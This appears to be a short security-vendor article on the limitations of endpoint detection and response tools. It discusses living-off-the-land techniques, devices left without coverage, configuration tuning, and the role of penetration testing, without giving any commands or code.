Deploying an endpoint detection and response solution across your estate is a significant security improvement. But EDR isn’t a magic shield. Like every security tool, it has limitations, gaps, and scenarios where it fails to detect or prevent malicious activity.
Understanding those limitations helps you build layered defences rather than relying on a single product to catch everything.
Living Off the Land
Attackers increasingly use legitimate system tools to carry out malicious actions. PowerShell, WMI, certutil, mshta, and dozens of other built-in Windows utilities can download files, execute code, and move laterally through networks. Because these tools are legitimate, EDR products face a constant challenge distinguishing malicious usage from administrative activity.
William Fieldhouse, Director of Aardwolf Security Ltd, comments: “Endpoint detection and response tools are powerful, but they have blind spots. During internal assessments, we routinely bypass EDR products using techniques that abuse legitimate system tools, living-off-the-land binaries, and process injection methods that EDR vendors are still catching up with.”
The most effective attacks chain multiple legitimate tools together. Each individual action looks benign. The malicious intent only becomes apparent when you view the full chain, which requires the kind of behavioural analysis that not all EDR products perform effectively.
Coverage Gaps in Your Fleet
EDR only protects devices where it’s installed and running. Unmanaged devices, BYOD endpoints, IoT devices, and legacy systems that can’t run modern agents create gaps in your coverage. An attacker who compromises an unprotected device on your network has a foothold that your EDR can’t see.
Maintain an accurate asset inventory and track EDR coverage against it. Any device on your network without EDR coverage represents a potential blind spot.
Configuration and Tuning Matter
Out-of-the-box EDR configurations balance security with usability. Many organisations leave default settings unchanged, missing opportunities to enable more aggressive detection rules that suit their environment.
Tune your EDR based on your environment’s normal behaviour patterns. Enable additional detection modules as your team’s ability to handle alerts matures. And regularly review which exclusions have been added, because every exclusion is a potential gap an attacker can exploit.
Testing EDR Effectiveness
Regular internal network penetration testing tests your EDR against real-world attack techniques. The results show exactly what your EDR catches, what it misses, and what it detects but fails to prevent.
Combining penetration testing with ongoing vulnerability scanning services ensures that both your detection tools and the underlying systems they protect remain properly configured and up to date. EDR is most effective as part of a layered security approach, not as a standalone solution.
